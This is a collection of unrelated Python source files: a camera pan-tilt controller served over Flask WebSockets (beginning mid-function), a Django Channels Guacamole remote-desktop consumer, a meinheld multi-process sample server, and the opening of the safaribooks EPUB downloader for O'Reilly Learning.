if pts == 'pan' and direction == 'left':
cur_value = em_status['pan']
cur_value -= pan_increment
print('Set Pan: %s' % str(cur_value))
em.set_pan(cur_value)
em_status['pan'] = cur_value
em_ready = True
if pts == 'pan' and direction == 'right':
cur_value = em_status['pan']
cur_value += pan_increment
print('Set Pan: %s' % str(cur_value))
em.set_pan(cur_value)
em_status['pan'] = cur_value
em_ready = True
if pts == 'slide' and direction == 'left':
cur_value = em_status['slide']
cur_value -= slide_increment
print('Set Slide: %s' % str(cur_value))
em.set_slide(cur_value)
em_status['slide'] = cur_value
em_ready = True
if pts == 'slide' and direction == 'right':
cur_value = em_status['slide']
cur_value += slide_increment
print('Set Slide: %s' % str(cur_value))
em.set_slide(cur_value)
em_status['slide'] = cur_value
em_ready = True
if pts == 'all' and direction == 'origin':
print('Set Pan: 0')
print('Set Tilt: 0')
print('Ignoring Slide')
em.set_all({
"pan": 0,
"tilt": 0
}, ignore_slide=True)
em_status['pan'] = 0
em_status['tilt'] = 0
em_ready = True
if pts == 'all' and direction == 'reset':
print('Changing Pan: 0')
print('Changing Tilt: 0')
em.zero_all_motors()
em_status['pan'] = 0
em_status['tilt'] = 0
em_ready = True
def process_diff(dx, dy):
print('')
print('DX: ', dx)
print('DY: ', dy)
dt = time.time()
# delta_pan = dx
delta_pan = -1 * pid_x(dx)
pan = int(em_status['pan']) + int(delta_pan)
# delta_tilt = dy
delta_tilt = -1 * pid_y(dy)
tilt = int(em_status['tilt']) + int(delta_tilt)
print('Delta Pan: ', delta_pan)
print('Delta Tilt: ', delta_tilt)
# Enforce Limits
if pan < 0:
pan = max(pan, pan_limits[0])
if pan > 0:
pan = min(pan, pan_limits[1])
if tilt < 0:
tilt = max(tilt, tilt_limits[0])
if tilt > 0:
tilt = min(tilt, tilt_limits[1])
print("Pan: ", pan)
print("Tilt: ", tilt)
emotimo_move_all(pan, tilt, 0)
def control_loop(controlQ, pixel_deadzone=0):
global control_loop_enabled
pts_last_time = 0
while control_loop_enabled:
dt = time.time()
reset_dt = False
if camera_shooting:
if pts_last_time + pts_interval < dt:
reset_dt = True
camera_take_shot()
if enable_pts_move:
while not controlQ.empty():
dx, dy = controlQ.get()
if abs(dx) < pixel_deadzone:
dx = 0
if abs(dy) < pixel_deadzone:
dy = 0
if pts_last_time + pts_interval < dt:
process_diff(dx, dy)
reset_dt = True
if reset_dt:
pts_last_time = dt
def camera_take_shot():
adb.take_photo()
def receive_serial(data):
action = data.get('action')
if action == 'open':
emotimo_open_serial()
if action == 'ready':
emotimo_ready_serial()
if action == 'close':
emotimo_close_serial()
def receive_pts(data):
global enable_pts_move
action = data.get('action')
if action == 'move':
detail = data.get('detail', {})
pts = detail.get('pts')
direction = detail.get('direction')
emotimo_move(pts, direction)
if action == 'reset-origin':
detail = data.get('detail', {})
pts = detail.get('pts')
emotimo_move(pts, 'reset')
if action == 'move-all':
pan = data.get('detail', {}).get('pan', 0)
tilt = data.get('detail', {}).get('tilt', 0)
slide = data.get('detail', {}).get('slide', 0)
emotimo_move_all(int(pan), int(tilt), slide)
if action == 'follow':
if data.get('detail') == 'enable':
enable_pts_move = True
if data.get('detail') == 'disable':
enable_pts_move = False
def receive_obj_tracking(data):
action = data.get('action')
if action:
sc.start_following()
else:
sc.stop_following()
def receive_click(data):
action = data.get('action')
if action == 'pos-update':
x = data.get('position', {}).get('x', 0)
y = data.get('position', {}).get('y', 0)
sc.set_point(x, y)
def receive_camera(data):
global pts_interval
global camera_shooting
action = data.get('action')
print(action)
if action == 'take-shot':
camera_take_shot()
if action == 'start-interval':
camera_shooting = True
if action == 'stop-interval':
camera_shooting = False
if action == 'set-interval':
pts_interval = float(data.get('detail', {}).get('interval', 2))
if action == 'modify-interval':
print('Too Hard for the moment')
if __name__ == '__main__':
# Initialize Flask
app = Flask(__name__, static_folder="./html")
# Add WebSockets
sock = Sock(app)
@sock.route('/control')
def control(ws):
socket_open = True
while socket_open:
resp_data = ws.receive()
if resp_data == 'finish':
socket_open = False
continue
data = json.loads(resp_data)
module = data.get('module', '')
if module == 'serial':
receive_serial(data)
if module == 'pts-move':
receive_pts(data)
if module == 'obj-track':
receive_obj_tracking(data)
if module == 'click-position':
receive_click(data)
if module == 'camera':
receive_camera(data)
@sock.route('/live')
def live(ws):
resp = ws.receive()
if resp == 'begin':
stream = True
else:
stream = False
while stream:
resp = ws.receive()
if resp == 'finish':
stream = False
continue
while not streamingQ.empty():
image = streamingQ.get()
_, buffer = cv2.imencode('.jpg', image)
frame = buffer.tobytes()
send_data = base64.b64encode(frame).decode()
ws.send(send_data)
ws.close(1000, 'Closing WS Connection')
@app.route('/camera-follow')
def camera_follow():
return send_from_directory(app.static_folder, 'index.html')
@app.route('/favicon.ico')
def favicon():
return send_from_directory(app.static_folder, 'favico.ico')
@app.route('/camera-follow.js')
def mouse_click():
return send_from_directory(app.static_folder, 'camera-follow.js')
# PTS and Photo Taking Control Thread
control_thread = threading.Thread(target=control_loop, args=(controlQ,))
control_thread.start()
try:
app.run('0.0.0.0', port=8000)
finally:
control_loop_enabled = False
control_thread.join()
streaming = False
sc.stop_capture()
em.close_connection()
time.sleep(2)
|
websocket_layer.py
|
import threading
from channels.generic.websocket import WebsocketConsumer
from django.conf import settings
from server.models import RemoteUserBindHost
from webssh.models import TerminalSession
import django.utils.timezone as timezone
from django.db.models import Q
from asgiref.sync import async_to_sync
from util.tool import gen_rand_char, terminal_log, res
from util.crypto import decrypt
import time
from .guacamoleclient import Client, ClientView
import re
import base64
from django.http.request import QueryDict
import os
import shutil
import logging
logging.basicConfig(level=logging.INFO, format='[%(asctime)s] - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
try:
terminal_exipry_time = settings.CUSTOM_TERMINAL_EXIPRY_TIME
except Exception:
terminal_exipry_time = 60 * 30
class WebGuacamole(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
query_string = self.scope.get('query_string').decode()
guacamole_args = QueryDict(query_string=query_string, encoding='utf-8')
self.hostid = int(guacamole_args.get('hostid'))
self.remote_host = None
self.width = guacamole_args.get('width')
self.height = guacamole_args.get('height')
self.dpi = guacamole_args.get('dpi')
self.session = None
self.start_time = timezone.now()
        self.send_flag = 0  # 0: send on this consumer's own channel; 1: send to the group channel (used when an administrator joins the group to watch the session)
self.group = 'session_' + gen_rand_char()
self.guacamoleclient = None
self.lock = False
self.last_operation_time = time.time()
self.closed = False
self.client = None
self.user_agent = None
def connect(self):
self.accept('guacamole')
        async_to_sync(self.channel_layer.group_add)(self.group, self.channel_name)  # join the group
self.session = self.scope.get('session', None)
        if not self.session.get('islogin', None):  # not logged in: close the websocket immediately
self.close(3001)
        if 'webguacamole终端' not in self.session[settings.INIT_PERMISSION]['titles']:  # permission check
self.close(3001)
if not self.session['issuperuser']:
hosts = RemoteUserBindHost.objects.filter(
Q(id=self.hostid),
Q(enabled=True),
Q(user__username=self.session['username']) | Q(group__user__username=self.session['username']),
).distinct()
else:
hosts = RemoteUserBindHost.objects.filter(
Q(id=self.hostid),
Q(enabled=True),
).distinct()
if not hosts:
self.close(3001)
self.remote_host = RemoteUserBindHost.objects.get(id=self.hostid)
_type = 7
        if self.remote_host.get_protocol_display() == 'vnc':  # VNC login does not require an account
_type = 8
        # Guacamole connection performance parameters:
        # enable_wallpaper: if "true", render the desktop wallpaper. Disabled by default.
        # enable_theming: if "true", enable window and control theming. Disabled by default.
        # enable_font_smoothing: if "true", render text with smoothed edges. By default, text over RDP is rendered without smoothing, which reduces the number of colors used and therefore the bandwidth required.
        # enable_full_window_drag: if "true", show window contents while dragging. By default, the RDP server only draws the window border during a drag.
        # enable_desktop_composition: if "true", allow graphical effects such as transparent windows and shadows. Such effects, if available, are disabled by default.
        # enable_menu_animations: if "true", allow menu open/close animations. Menu animations are disabled by default.
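        # For example, any of these could be added to the connection kwargs built below, e.g.:
        #   kwargs['enable_wallpaper'] = "true"
        #   kwargs['enable_desktop_composition'] = "true"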
self.guacamoleclient = Client(websocker=self)
        if 'webguacamole终端文件上传下载' not in self.session[settings.INIT_PERMISSION]['titles']:  # permission check (file upload/download)
kwargs = {
'protocol': self.remote_host.get_protocol_display(),
'hostname': self.remote_host.ip,
'port': self.remote_host.port,
'username': self.remote_host.remote_user.username,
'password': decrypt(self.remote_host.remote_user.password),
'width': self.width,
'height': self.height,
'dpi': self.dpi,
'enable_font_smoothing': "true",
}
if self.remote_host.remote_user.domain:
kwargs['domain'] = self.remote_host.remote_user.domain
if self.remote_host.security:
kwargs['security'] = self.remote_host.security
self.guacamoleclient.connect(**kwargs)
else:
kwargs = {
'protocol': self.remote_host.get_protocol_display(),
'hostname': self.remote_host.ip,
'port': self.remote_host.port,
'username': self.remote_host.remote_user.username,
'password': decrypt(self.remote_host.remote_user.password),
'width': self.width,
'height': self.height,
'dpi': self.dpi,
'enable_font_smoothing': "true",
'enable_drive': "true",
'drive_name': "filesystem",
'drive_path': "/fs/{}".format(self.group),
'create_drive_path': "true",
}
if self.remote_host.remote_user.domain:
kwargs['domain'] = self.remote_host.remote_user.domain
if self.remote_host.security:
kwargs['security'] = self.remote_host.security
self.guacamoleclient.connect(**kwargs)
for i in self.scope['headers']:
if i[0].decode('utf-8') == 'user-agent':
self.user_agent = i[1].decode('utf-8')
break
for i in self.scope['headers']:
if i[0].decode('utf-8') == 'x-real-ip':
self.client = i[1].decode('utf-8')
break
if i[0].decode('utf-8') == 'x-forwarded-for':
self.client = i[1].decode('utf-8').split(',')[0]
break
self.client = self.scope['client'][0]
data = {
'name': self.channel_name,
'group': self.group,
'user': self.session.get('username'),
'host': self.remote_host.ip,
'username': self.remote_host.remote_user.username,
'protocol': self.remote_host.protocol,
'port': self.remote_host.port,
'type': _type, # 7 webrdp 8 webvnc
'address': self.client,
'useragent': self.user_agent,
'connect_info': '{0}_{1}_{2}_{3}'.format(self.width, self.height, self.dpi, self.guacamoleclient.guacamoleclient.id)
}
TerminalSession.objects.create(**data)
t = threading.Thread(target=self.check_timeout)
t.daemon = True
t.start()
        # Send the group name to the client (used by the web page for file uploads); a custom handler for the 'group' instruction must be defined in guacamole/js/all.js
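        # Guacamole instructions are length-prefixed ("<length>.<value>,...;"); for a hypothetical
        # group name 'session_abcdefgh' (16 chars) this sends: 5.group,10.group_name,16.session_abcdefgh;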
self.send('5.group,10.group_name,{0}.{1};'.format(len(self.group), self.group))
def disconnect(self, close_code):
time.sleep(0.5)
if not self.closed:
self.closed = True
if 'webguacamole终端文件上传下载' in self.session[settings.INIT_PERMISSION]['titles']:
try:
upload_file_path = os.path.join(settings.GUACD_ROOT, self.group)
shutil.rmtree(upload_file_path, ignore_errors=True)
except Exception:
pass
try:
                async_to_sync(self.channel_layer.group_send)(self.group, {  # close any viewers
"type": "close.viewer",
"text": "",
})
async_to_sync(self.channel_layer.group_discard)(self.group, self.channel_name)
if close_code != 3001:
self.guacamoleclient.close()
except Exception:
pass
finally:
if self.guacamoleclient.res:
try:
tmp = list(self.guacamoleclient.res)
self.guacamoleclient.res = []
res(self.guacamoleclient.res_file, tmp, False)
except Exception:
pass
try:
terminal_log(
self.session.get('username'),
self.remote_host.hostname,
self.remote_host.ip,
self.remote_host.get_protocol_display(),
self.remote_host.port,
self.remote_host.remote_user.username,
self.guacamoleclient.file_cmd,
self.guacamoleclient.res_file,
self.client,
self.user_agent,
self.start_time,
)
except Exception:
pass
TerminalSession.objects.filter(name=self.channel_name, group=self.group).delete()
def receive(self, text_data=None, bytes_data=None):
if not self.lock:
self.guacamoleclient.shell(text_data)
if not text_data.startswith('4.sync') and not text_data.startswith('3.nop'):
self.last_operation_time = time.time()
else:
if text_data.startswith('4.sync') or text_data.startswith('3.nop'):
self.guacamoleclient.shell(text_data)
else:
if re.match(r'^5\.mouse,.*1\.1;$', text_data) or re.match(r'^3\.key,.*1\.1;$', text_data):
message = str(base64.b64encode('当前会话已被管理员锁定'.encode('utf-8')), 'utf-8')
                    self.send('6.toastr,1.1,{0}.{1};'.format(len(message), message))  # send a warning toast to the client
    # Called from outside the session via channels.layers with type 'group.message'
def group_message(self, data):
try:
self.send(data['text'])
except Exception:
pass
    # Called from outside the session via channels.layers with type 'close.message'
def close_message(self, data):
try:
message = str(base64.b64encode('当前会话已被管理员关闭'.encode('utf-8')), 'utf-8')
            # Send a toastr warning to the client
            # A custom handler for the 'toastr' instruction must be defined in guacamole/js/all.js
self.send('6.toastr,1.2,{0}.{1};'.format(len(message), message))
self.close()
except Exception:
pass
def lock_message(self, data):
if not self.lock:
self.lock = True
message = str(base64.b64encode('当前会话已被管理员锁定'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.1,{0}.{1};'.format(len(message), message))
def unlock_message(self, data):
if self.lock:
self.lock = False
message = str(base64.b64encode('当前会话已被管理员解锁'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.0,{0}.{1};'.format(len(message), message))
def check_timeout(self, sleep_time=3):
while 1:
if self.closed:
break
if int(time.time() - self.last_operation_time) >= terminal_exipry_time:
try:
message = str(base64.b64encode('由于长时间没有操作或者没有数据返回,连接已断开!'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.2,{0}.{1};'.format(len(message), message))
self.close()
except Exception:
pass
break
time.sleep(sleep_time)
def upload_message(self, data):
cmd_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(int(time.time())))
filename = data['text']
self.guacamoleclient.file_cmd += cmd_time + "\t" + '上传文件 - {}'.format(filename) + '\n'
class WebGuacamole_view(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.session = None
def connect(self):
self.accept('guacamole')
self.session = self.scope.get('session', None)
        if not self.session.get('islogin', None):  # not logged in: close the websocket immediately
self.close()
        if '终端会话查看' not in self.session[settings.INIT_PERMISSION]['titles']:  # permission check
self.close()
query_string = self.scope.get('query_string').decode()
args = QueryDict(query_string=query_string, encoding='utf-8')
self.group = args.get('group')
terminalsession = object
try:
terminalsession = TerminalSession.objects.get(group=self.group)
except Exception:
self.close()
tmp = terminalsession.connect_info.split("_")
width = tmp[0]
height = tmp[1]
dpi = tmp[2]
protocol = tmp[3]
self.guacamoleclient = ClientView(websocker=self)
self.guacamoleclient.connect(
protocol=protocol,
hostname='',
port='',
username='',
password='',
width=width,
height=height,
dpi=dpi,
enable_font_smoothing="true",
)
        # Send the display resolution to the viewer client
self.send("7.display,{0}.{1},{2}.{3},{4}.{5};".format(len(width), width, len(height), height, len(dpi), dpi))
        async_to_sync(self.channel_layer.group_add)(self.group, self.channel_name)  # join the group
def disconnect(self, close_code):
async_to_sync(self.channel_layer.group_discard)(self.group, self.channel_name)
self.guacamoleclient.close()
def receive(self, text_data=None, bytes_data=None):
if text_data.startswith('4.sync') or text_data.startswith('3.nop'):
self.guacamoleclient.shell(text_data)
def close_viewer(self, data):
message = str(base64.b64encode('会话已关闭'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.2,{0}.{1};'.format(len(message), message))
self.close()
def upload_message(self, data):
pass
|
fork_sample.py
|
import meinheld
from multiprocessing import Process
import signal
workers = []
def hello_world(environ, start_response):
status = '200 OK'
res = "Hello world!"
response_headers = [('Content-type','text/plain'),('Content-Length',str(len(res)))]
start_response(status, response_headers)
# print environ
return [res]
def run(app, i):
meinheld.run(app)
def kill_all(sig, st):
for w in workers:
w.terminate()
def start(num=4):
for i in range(num):
p = Process(name="worker-%d" % i, target=run, args=(hello_world,i))
workers.append(p)
p.start()
signal.signal(signal.SIGTERM, kill_all)
meinheld.set_keepalive(10)
meinheld.set_access_logger(None)
meinheld.set_error_logger(None)
meinheld.listen(("0.0.0.0", 8000))
start()
|
safaribooks.py
|
#!/usr/bin/env python3
# coding: utf-8
import re
import os
import sys
import json
import shutil
import pathlib
import getpass
import logging
import argparse
import requests
import traceback
from html import escape
from random import random
from lxml import html, etree
from multiprocessing import Process, Queue, Value
from urllib.parse import urljoin, urlparse, parse_qs, quote_plus
PATH = os.path.dirname(os.path.realpath(__file__))
COOKIES_FILE = os.path.join(PATH, "cookies.json")
ORLY_BASE_HOST = "oreilly.com" # PLEASE INSERT URL HERE
SAFARI_BASE_HOST = "learning." + ORLY_BASE_HOST
API_ORIGIN_HOST = "api." + ORLY_BASE_HOST
ORLY_BASE_URL = "https://www." + ORLY_BASE_HOST
SAFARI_BASE_URL = "https://" + SAFARI_BASE_HOST
API_ORIGIN_URL = "https://" + API_ORIGIN_HOST
PROFILE_URL = SAFARI_BASE_URL + "/profile/"
# DEBUG
USE_PROXY = False
PROXIES = {"https": "https://127.0.0.1:8080"}
class Display:
BASE_FORMAT = logging.Formatter(
fmt="[%(asctime)s] %(message)s",
datefmt="%d/%b/%Y %H:%M:%S"
)
SH_DEFAULT = "\033[0m" if "win" not in sys.platform else "" # TODO: colors for Windows
SH_YELLOW = "\033[33m" if "win" not in sys.platform else ""
SH_BG_RED = "\033[41m" if "win" not in sys.platform else ""
SH_BG_YELLOW = "\033[43m" if "win" not in sys.platform else ""
def __init__(self, log_file):
self.output_dir = ""
self.output_dir_set = False
self.log_file = os.path.join(PATH, log_file)
self.logger = logging.getLogger("SafariBooks")
self.logger.setLevel(logging.INFO)
logs_handler = logging.FileHandler(filename=self.log_file)
logs_handler.setFormatter(self.BASE_FORMAT)
logs_handler.setLevel(logging.INFO)
self.logger.addHandler(logs_handler)
self.columns, _ = shutil.get_terminal_size()
self.logger.info("** Welcome to SafariBooks! **")
self.book_ad_info = False
self.css_ad_info = Value("i", 0)
self.images_ad_info = Value("i", 0)
self.last_request = (None,)
self.in_error = False
self.state_status = Value("i", 0)
sys.excepthook = self.unhandled_exception
def set_output_dir(self, output_dir):
self.info("Output directory:\n %s" % output_dir)
self.output_dir = output_dir
self.output_dir_set = True
def unregister(self):
self.logger.handlers[0].close()
sys.excepthook = sys.__excepthook__
def log(self, message):
try:
self.logger.info(str(message, "utf-8", "replace"))
except (UnicodeDecodeError, Exception):
self.logger.info(message)
def out(self, put):
pattern = "\r{!s}\r{!s}\n"
try:
s = pattern.format(" " * self.columns, str(put, "utf-8", "replace"))
except TypeError:
s = pattern.format(" " * self.columns, put)
sys.stdout.write(s)
def info(self, message, state=False):
self.log(message)
output = (self.SH_YELLOW + "[*]" + self.SH_DEFAULT if not state else
self.SH_BG_YELLOW + "[-]" + self.SH_DEFAULT) + " %s" % message
self.out(output)
def error(self, error):
if not self.in_error:
self.in_error = True
self.log(error)
output = self.SH_BG_RED + "[#]" + self.SH_DEFAULT + " %s" % error
self.out(output)
def exit(self, error):
self.error(str(error))
if self.output_dir_set:
output = (self.SH_YELLOW + "[+]" + self.SH_DEFAULT +
" Please delete the output directory '" + self.output_dir + "'"
" and restart the program.")
self.out(output)
output = self.SH_BG_RED + "[!]" + self.SH_DEFAULT + " Aborting..."
self.out(output)
self.save_last_request()
sys.exit(1)
def unhandled_exception(self, _, o, tb):
self.log("".join(traceback.format_tb(tb)))
self.exit("Unhandled Exception: %s (type: %s)" % (o, o.__class__.__name__))
def save_last_request(self):
if any(self.last_request):
self.log("Last request done:\n\tURL: {0}\n\tDATA: {1}\n\tOTHERS: {2}\n\n\t{3}\n{4}\n\n{5}\n"
.format(*self.last_request))
def intro(self):
output = self.SH_YELLOW + ("""
____ ___ _
/ __/__ _/ _/__ _____(_)
_\ \/ _ `/ _/ _ `/ __/ /
/___/\_,_/_/ \_,_/_/ /_/
/ _ )___ ___ / /__ ___
/ _ / _ \/ _ \/ '_/(_-<
/____/\___/\___/_/\_\/___/
""" if random() > 0.5 else """
██████╗ ██████╗ ██╗ ██╗ ██╗██████╗
██╔═══██╗ ██╔══██╗██║ ╚██╗ ██╔╝╚════██╗
██║ ██║ ██████╔╝██║ ╚████╔╝ ▄███╔╝
██║ ██║ ██╔══██╗██║ ╚██╔╝ ▀▀══╝
╚██████╔╝ ██║ ██║███████╗██║ ██╗
╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
""") + self.SH_DEFAULT
output += "\n" + "~" * (self.columns // 2)
self.out(output)
def parse_description(self, desc):
if not desc:
return "n/d"
try:
return html.fromstring(desc).text_content()
except (html.etree.ParseError, html.etree.ParserError) as e:
self.log("Error parsing the description: %s" % e)
return "n/d"
def book_info(self, info):
description = self.parse_description(info.get("description", None)).replace("\n", " ")
for t in [
("Title", info.get("title", "")), ("Authors", ", ".join(aut.get("name", "") for aut in info.get("authors", []))),
("Identifier", info.get("identifier", "")), ("ISBN", info.get("isbn", "")),
("Publishers", ", ".join(pub.get("name", "") for pub in info.get("publishers", []))),
("Rights", info.get("rights", "")),
("Description", description[:500] + "..." if len(description) >= 500 else description),
("Release Date", info.get("issued", "")),
("URL", info.get("web_url", ""))
]:
self.info("{0}{1}{2}: {3}".format(self.SH_YELLOW, t[0], self.SH_DEFAULT, t[1]), True)
def state(self, origin, done):
progress = int(done * 100 / origin)
bar = int(progress * (self.columns - 11) / 100)
if self.state_status.value < progress:
self.state_status.value = progress
sys.stdout.write(
"\r " + self.SH_BG_YELLOW + "[" + ("#" * bar).ljust(self.columns - 11, "-") + "]" +
self.SH_DEFAULT + ("%4s" % progress) + "%" + ("\n" if progress == 100 else "")
)
def done(self, epub_file):
self.info("Done: %s\n\n" % epub_file +
" If you like it, please * this project on GitHub to make it known:\n"
" https://github.com/lorenzodifuccia/safaribooks\n"
" e don't forget to renew your Safari Books Online subscription:\n"
" " + SAFARI_BASE_URL + "\n\n" +
self.SH_BG_RED + "[!]" + self.SH_DEFAULT + " Bye!!")
@staticmethod
def api_error(response):
message = "API: "
if "detail" in response and "Not found" in response["detail"]:
message += "book's not present in Safari Books Online.\n" \
" The book identifier is the digits that you can find in the URL:\n" \
" `" + SAFARI_BASE_URL + "/library/view/book-name/XXXXXXXXXXXXX/`"
else:
os.remove(COOKIES_FILE)
message += "Out-of-Session%s.\n" % (" (%s)" % response["detail"]) if "detail" in response else "" + \
Display.SH_YELLOW + "[+]" + Display.SH_DEFAULT + \
" Use the `--cred` or `--login` options in order to perform the auth login to Safari."
return message
class WinQueue(list): # TODO: error while use `process` in Windows: can't pickle _thread.RLock objects
def put(self, el):
self.append(el)
def qsize(self):
return self.__len__()
class SafariBooks:
LOGIN_URL = ORLY_BASE_URL + "/member/auth/login/"
LOGIN_ENTRY_URL = SAFARI_BASE_URL + "/login/unified/?next=/home/"
API_TEMPLATE = SAFARI_BASE_URL + "/api/v1/book/{0}/"
BASE_01_HTML = "<!DOCTYPE html>\n" \
"<html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\"" \
" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"" \
" xsi:schemaLocation=\"http://www.w3.org/2002/06/xhtml2/" \
" http://www.w3.org/MarkUp/SCHEMA/xhtml2.xsd\"" \
" xmlns:epub=\"http://www.idpf.org/2007/ops\">\n" \
"<head>\n" \
"{0}\n" \
"<style type=\"text/css\">" \
"body{{margin:1em;background-color:transparent!important;}}" \
"#sbo-rt-content *{{text-indent:0pt!important;}}#sbo-rt-content .bq{{margin-right:1em!important;}}"
KINDLE_HTML = "#sbo-rt-content *{{word-wrap:break-word!important;" \
"word-break:break-word!important;}}#sbo-rt-content table,#sbo-rt-content pre" \
"{{overflow-x:unset!important;overflow:unset!important;" \
"overflow-y:unset!important;white-space:pre-wrap!important;}}"
BASE_02_HTML = "</style>" \
"</head>\n" \
"<body>{1}</body>\n</html>"
CONTAINER_XML = "<?xml version=\"1.0\"?>" \
"<container version=\"1.0\" xmlns=\"urn:oasis:names:tc:opendocument:xmlns:container\">" \
"<rootfiles>" \
"<rootfile full-path=\"OEBPS/content.opf\" media-type=\"application/oebps-package+xml\" />" \
"</rootfiles>" \
"</container>"
# Format: ID, Title, Authors, Description, Subjects, Publisher, Rights, Date, CoverId, MANIFEST, SPINE, CoverUrl
CONTENT_OPF = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n" \
"<package xmlns=\"http://www.idpf.org/2007/opf\" unique-identifier=\"bookid\" version=\"2.0\" >\n" \
"<metadata xmlns:dc=\"http://purl.org/dc/elements/1.1/\" " \
" xmlns:opf=\"http://www.idpf.org/2007/opf\">\n" \
"<dc:title>{1}</dc:title>\n" \
"{2}\n" \
"<dc:description>{3}</dc:description>\n" \
"{4}" \
"<dc:publisher>{5}</dc:publisher>\n" \
"<dc:rights>{6}</dc:rights>\n" \
"<dc:language>en-US</dc:language>\n" \
"<dc:date>{7}</dc:date>\n" \
"<dc:identifier id=\"bookid\">{0}</dc:identifier>\n" \
"<meta name=\"cover\" content=\"{8}\"/>\n" \
"</metadata>\n" \
"<manifest>\n" \
"<item id=\"ncx\" href=\"toc.ncx\" media-type=\"application/x-dtbncx+xml\" />\n" \
"{9}\n" \
"</manifest>\n" \
"<spine toc=\"ncx\">\n{10}</spine>\n" \
"<guide><reference href=\"{11}\" title=\"Cover\" type=\"cover\" /></guide>\n" \
"</package>"
# Format: ID, Depth, Title, Author, NAVMAP
TOC_NCX = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"no\" ?>\n" \
"<!DOCTYPE ncx PUBLIC \"-//NISO//DTD ncx 2005-1//EN\"" \
" \"http://www.daisy.org/z3986/2005/ncx-2005-1.dtd\">\n" \
"<ncx xmlns=\"http://www.daisy.org/z3986/2005/ncx/\" version=\"2005-1\">\n" \
"<head>\n" \
"<meta content=\"ID:ISBN:{0}\" name=\"dtb:uid\"/>\n" \
"<meta content=\"{1}\" name=\"dtb:depth\"/>\n" \
"<meta content=\"0\" name=\"dtb:totalPageCount\"/>\n" \
"<meta content=\"0\" name=\"dtb:maxPageNumber\"/>\n" \
"</head>\n" \
"<docTitle><text>{2}</text></docTitle>\n" \
"<docAuthor><text>{3}</text></docAuthor>\n" \
"<navMap>{4}</navMap>\n" \
"</ncx>"
HEADERS = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Referer": LOGIN_ENTRY_URL,
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/90.0.4430.212 Safari/537.36"
}
COOKIE_FLOAT_MAX_AGE_PATTERN = re.compile(r'(max-age=\d*\.\d*)', re.IGNORECASE)
def __init__(self, args):
self.args = args
self.display = Display("info_%s.log" % escape(args.bookid))
self.display.intro()
self.session = requests.Session()
if USE_PROXY: # DEBUG
self.session.proxies = PROXIES
self.session.verify = False
self.session.headers.update(self.HEADERS)
self.jwt = {}
if not args.cred:
if not os.path.isfile(COOKIES_FILE):
self.display.exit("Login: unable to find `cookies.json` file.\n"
" Please use the `--cred` or `--login` options to perform the login.")
self.session.cookies.update(json.load(open(COOKIES_FILE)))
else:
self.display.info("Logging into Safari Books Online...", state=True)
self.do_login(*args.cred)
if not args.no_cookies:
json.dump(self.session.cookies.get_dict(), open(COOKIES_FILE, 'w'))
self.check_login()
self.book_id = args.bookid
self.api_url = self.API_TEMPLATE.format(self.book_id)
self.display.info("Retrieving book info...")
self.book_info = self.get_book_info()
self.display.book_info(self.book_info)
self.display.info("Retrieving book chapters...")
self.book_chapters = self.get_book_chapters()
self.chapters_queue = self.book_chapters[:]
if len(self.book_chapters) > sys.getrecursionlimit():
sys.setrecursionlimit(len(self.book_chapters))
self.book_title = self.book_info["title"]
self.base_url = self.book_info["web_url"]
self.clean_book_title = "".join(self.escape_dirname(self.book_title).split(",")[:2]) \
+ " ({0})".format(self.book_id)
books_dir = os.path.join(PATH, "Books")
if not os.path.isdir(books_dir):
os.mkdir(books_dir)
self.BOOK_PATH = os.path.join(books_dir, self.clean_book_title)
self.display.set_output_dir(self.BOOK_PATH)
self.css_path = ""
self.images_path = ""
self.create_dirs()
self.chapter_title = ""
self.filename = ""
self.chapter_stylesheets = []
self.css = []
self.images = []
self.display.info("Downloading book contents... (%s chapters)" % len(self.book_chapters), state=True)
self.BASE_HTML = self.BASE_01_HTML + (self.KINDLE_HTML if not args.kindle else "") + self.BASE_02_HTML
self.cover = False
self.get()
if not self.cover:
self.cover = self.get_default_cover() if "cover" in self.book_info else False
cover_html = self.parse_html(
html.fromstring("<div id=\"sbo-rt-content\"><img src=\"Images/{0}\"></div>".format(self.cover)), True
)
self.book_chapters = [{
"filename": "default_cover.xhtml",
"title": "Cover"
}] + self.book_chapters
self.filename = self.book_chapters[0]["filename"]
self.save_page_html(cover_html)
self.css_done_queue = Queue(0) if "win" not in sys.platform else WinQueue()
self.display.info("Downloading book CSSs... (%s files)" % len(self.css), state=True)
self.collect_css()
self.images_done_queue = Queue(0) if "win" not in sys.platform else WinQueue()
self.display.info("Downloading book images... (%s files)" % len(self.images), state=True)
self.collect_images()
self.display.info("Creating EPUB file...", state=True)
self.create_epub()
if not args.no_cookies:
json.dump(self.session.cookies.get_dict(), open(COOKIES_FILE, "w"))
self.display.done(os.path.join(self.BOOK_PATH, self.book_id + ".epub"))
self.display.unregister()
if not self.display.in_error and not args.log:
os.remove(self.display.log_file)
def handle_cookie_update(self, set_cookie_headers):
for morsel in set_cookie_headers:
# Handle Float 'max-age' Cookie
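# (Example of the kind of header handled here - hypothetical values:
#  "Set-Cookie: sessionid=abc; Max-Age=3600.0; Path=/" - where the fractional
#  Max-Age apparently trips up the normal cookie handling, hence the manual
#  re-set of the name/value pair on the session below.)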
if self.COOKIE_FLOAT_MAX_AGE_PATTERN.search(morsel):
cookie_key, cookie_value = morsel.split(";")[0].split("=")
self.session.cookies.set(cookie_key, cookie_value)
def requests_provider(self, url, is_post=False, data=None, perform_redirect=True, **kwargs):
try:
response = getattr(self.session, "post" if is_post else "get")(
url,
data=data,
allow_redirects=False,
**kwargs
)
